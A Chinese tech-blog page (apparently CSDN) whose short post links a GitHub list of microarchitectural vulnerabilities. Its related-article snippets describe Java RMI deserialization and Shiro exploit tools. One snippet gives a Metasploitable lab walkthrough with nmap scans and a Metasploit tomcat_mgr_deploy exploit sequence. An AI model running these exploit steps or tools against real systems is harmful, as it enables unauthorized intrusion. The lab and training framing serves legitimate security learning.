attack

最新推荐文章于 2025-07-02 12:56:09 发布
转载 最新推荐文章于 2025-07-02 12:56:09 发布 · 364 阅读 · 0

发现一个GitHub页面(https://github.com/axmat/uarchsec ),该页面记录了很多漏洞及对应的论文,可供有兴趣者查看。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

发现一个页面记录了很多漏洞及对应的论文,有兴趣的可以看看https://github.com/axmat/uarchsec

runshui27
关注
attackRMI.jar
11-28
attackRMI.jar
attackRmi:AttackRmi
04-12
AttackRmi 该项目使用套接字将数据包直接发送到攻击rmi。 以下jdk版本指的是openjdk的版本 以下方法通过反序列化攻击rmi,因此以下6种攻击方法要求本地类路径包含小工具 AttackRegistryByBindAndAnnotationInvocationHandler 这实际上是ysoserial的RMIRegistryExploit。 状况: <jdk8u121 AttackRegistryByDGC 状况: <jdk8u121 AttackRegistryByLookup 状况: <jdk8u121 AttackRegistryByLookupAndUnicastRef 状况: <jdk8u232 AttackRegistryByLookupAndUnicastRefRemoteObject 状况: <jdk8u242 A
【网络安全】ATT&CK框架
最新发布
weixin_49199313的博客
07-02 819
它通过系统化整理攻击者在真实攻击链中的战术、技术和程序(TTP),为防御者提供标准化参考,推动主动防御体系的构建。​:统一描述攻击链的战术(Tactics)、技术(Techniques)、子技术(Sub-techniques)。​:MITRE Engenuity评估项目公开测试安全产品(如Cortex XDR)的ATT&CK检出率。​:将日志事件映射到ATT&CK矩阵,快速定位攻击阶段(如横向移动或数据外泄)。​:帮助防御者识别攻击模式,超越传统基于特征(如IP/哈希)的检测局限。
攻击JMX的RMI服务
公众号shadow sock7
05-21 693
参考: https://github.com/k1n9/k1n9.github.io/blob/aeeb609fe6a25d67bc2dc5f990a501368fb25409/_posts/2017-08-24-attack-jmx-rmi.md https://webcache.googleusercontent.com/search?q=cache%3Ahttps%3A%2F%2Fwww.optiv.com%2Fblog%2Fexploiting-jmx-rmi&oq=cache%3Ahtt
attack_framework:一个攻击框架
06-03
attack_framework 一个攻击框架 入口文件atck.py -h
attackRMI.zip
05-25
RMI是Remote Method Invocation的简称,是J2SE的一部分,能够让程序员开发出基于Java的分布式应用。一个RMI对象是一个远程Java对象,可以从另一个Java虚拟机上(甚至跨过网络)调用它的方法,可以像调用本地Java对象的方法一样调用远程对象的方法,使分布在不同的JVM中的对象的外表和行为都像本地对象一样。
shiro-attack-4.7.0-SNAPSHOT-all.zip
10-24
标题提到的"shiro-attack-4.7.0-SNAPSHOT-all.zip"很可能是针对Apache Shiro的安全测试工具或者漏洞利用工具包,其主要目的是帮助开发者检测和防范Shiro框架相关的安全问题。 描述中的"序列化验证工具"可能是指该...
shiro_attack_2.2和ShiroExploit.V2.51工具,两个工具都在里面,,shiro利用工具,用于
03-17
shiro_attack_2.2和ShiroExploit.V2.51工具,两个工具都在里面,,shiro利用工具,用于测试shiro反序列化漏洞的工具,很好用,通过命令java -jar ***.jar启动即可
shiro_attack_2.2.zip
07-18
在"shiro_attack_2.2.zip"这个压缩包中,我们可以推测它可能包含了关于Apache Shiro的安全攻击分析或者防御策略,特别是针对其2.2版本的。下面我们将深入探讨Apache Shiro的基本概念、常见攻击以及如何防范这些攻击...
【DNS缓存中毒实验】SEED lab:DNS Remote Attack Lab The Kaminsky Attack
04-11
这个实验,"SEED lab:DNS Remote Attack Lab The Kaminsky Attack",旨在让你亲身体验并理解这种攻击方式。 DNS缓存中毒是一种网络安全攻击,攻击者通过篡改DNS服务器的缓存记录,将合法的域名指向错误的IP地址,...
shiro反序列化attack
09-29
“本工具仅能在取得足够合法授权的企业安全建设中使用,在使用本工具过程中,您应确保自己所有行为符合当地的法律法规。 如您在使用本工具的过程中存在任何非法行为,您将自行承担所有后果,本工具所有开发者和所有...
diffie-hellman attack 代码
09-10
关于diffie-hellman攻击的代码描述。
达索matrixone系统的eMatrixServletRMI.jar
02-24
截至 2010-05-20 达索官方发布的 eMatrixServletRMI.jar 有最新版本。 包含 java 类如下: com.matrixone.client.designsync.* com.matrixone.client.* com.matrixone.fcs.applet.* com.matrixone.fcs.backend.* com.matrixone.fcs.common.* com.matrixone.fcs.fcs.* com.matrixone.fcs.http.* com.matrixone.fcs.mcs.* com.matrixone.fcs.tools.* com.matrixone.fcs.zip.* com.matrixone..jdl.* com.matrixone.jni.* com.matrixone.json.* com.matrixone.mxff.* com.matrixone.portlet.* com.matrixone.search.* com.matrixone.servlet.* com.matrixone.threadpool.* com.matrixone.util.* matrix.common.* matrix.db.* matrix.dbutil.* matrix.resource.* matrix.tagdb.* matrix.util.* matrix.vui.* mxff.client.*
javaRMI反序列化漏洞验证工具
08-21
检测javaRMI反序列化漏洞
探秘攻击RMI:attackRmi开源项目深度解析
gitblog_00048的博客
05-27 445
探秘攻击RMI:attackRmi开源项目深度解析 attackRmiattackRmi项目地址:https://gitcode.com/gh_mirrors/at/attackRmi 在网络安全领域,Java RMI(远程方法调用)技术因其便利性而被广泛应用,但同时也成为恶意攻击的目标。幸运的是,我们有一款名为attackRmi的开源项目,专门针对RMI的安全漏洞进行研究与测试,帮助开发者预防...
攻击面框架(Attack Surface Framework):企业安全的得力助手
gitblog_00043的博客
06-01 552
攻击面框架(Attack Surface Framework):企业安全的得力助手 项目简介 Attack Surface Framework(ASF)是一个强大的开源工具,专为保护组织免受攻击面威胁而设计。它能发现和枚举资产及其子域名的端口和服务,并跟踪差异,同时利用公共POC作为额外的安全层,以对抗零日漏洞。ASF不仅提供持续扫描和自动化暴露功能,还整合了单一视图下的多个安全工具,实现整个漏洞...
探秘AttackRmi:一款安全研究人员的利器
gitblog_00001的博客
03-28 490
探秘AttackRmi:一款安全研究人员的利器 去发现同类优质开源项目:https://gitcode.com/ 项目简介 是一个开源项目,旨在帮助安全研究人员和开发者识别并模拟RMI(远程方法调用)攻击。项目的核心是通过自动化工具,对Java RMI服务进行安全测试,揭示潜在的安全漏洞。 技术分析 AttackRmi 使用了Java语言开发,充分利用了JDK中的java.rmi包来进行RMI通信...
精通JavaScript攻击框架:AttackAPI(下)
Mr.ROBOT
12-01 520
宇文 多年来客户端安全一直未引起人们的足够重视,但是如今情况发生了急剧转变,客户端安全已经成为信息安全领域的焦点之一。Web恶意软件、AJAX蠕虫、浏览历史暴破、登录检测、傀儡控制技术网络端口扫描以及浏览器劫持等各种技术只是安全研究人员地下实验室的部分技术,但是已经带来了非常大的影响。 一种类型的安全专业浮现并变成主流利用机制时,供应厂商和个人就会开始发行框架和自动工具,来处理工具和测
一文回顾攻击Java RMI方式
zybb166的博客
01-10 878
前序 RMI存在着三个主体 RMI Registry RMI Client RMI Server 而对于这三个主体其实都可以攻击,当然了需要根据jdk版本以及环境寻找对应的利用方式。 Ps.在最初接触的RMI洞是拿着工具一把梭,因此在以前看来笔者以为RMI是一个服务,暴露出端口后就可以随意攻击,现在看来是我才疏学浅了,对于RMI的理解过于片面了。本文是笔者在学习RMI的各种攻击方式后的小结,若有错误,请指出。 Ps1.本文并无任何新知识点,仅仅是对于各位师傅文章的一个小总结。 RMI为何 关
Attack lab
06-09
### Attack Lab in Cybersecurity or Penetration Testing Attack lab is a common term used in cybersecurity and penetration testing to describe an environment where individuals can practice and develop their skills in identifying vulnerabilities, exploiting systems, and understanding the mechanics of cyberattacks. Such labs often include tools like Metasploitable[^1], which is a deliberately vulnerable operating system designed for security training and testing purposes. These environments are critical for both beginners and advanced professionals who wish to enhance their knowledge and practical abilities in ethical hacking. In the context of cybersecurity or penetration testing, an attack lab typically includes: - A controlled environment where users can simulate real-world attacks without causing harm to actual systems. - Tools such as Kali Linux, Nmap, Metasploit, and others that aid in vulnerability scanning, exploitation, and post-exploitation activities. - Virtual machines (VMs) like Metasploitable, which provide pre-configured vulnerable systems for practice. - Specific rules and guidelines to ensure safe and ethical use of the lab environment, such as prohibiting the use of unauthorized hardware like Rubber Ducky devices[^2]. Here is an example of setting up a simple attack lab using Metasploitable and Kali Linux: ```bash # On Kali Linux machine: Scan the network for active hosts nmap -sn 192.168.56.0/24 # Once the Metasploitable VM IP is identified, perform a detailed scan nmap -sV -p- 192.168.56.101 # Exploit a known vulnerability using Metasploit msfconsole use exploit/multi/http/tomcat_mgr_deploy set RHOSTS 192.168.56.101 set LHOST 192.168.56.1 exploit ``` The above commands demonstrate how to identify and exploit a vulnerability in a Metasploitable instance using Kali Linux tools. This setup allows learners to understand the process of discovering and exploiting weaknesses in a controlled manner. ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值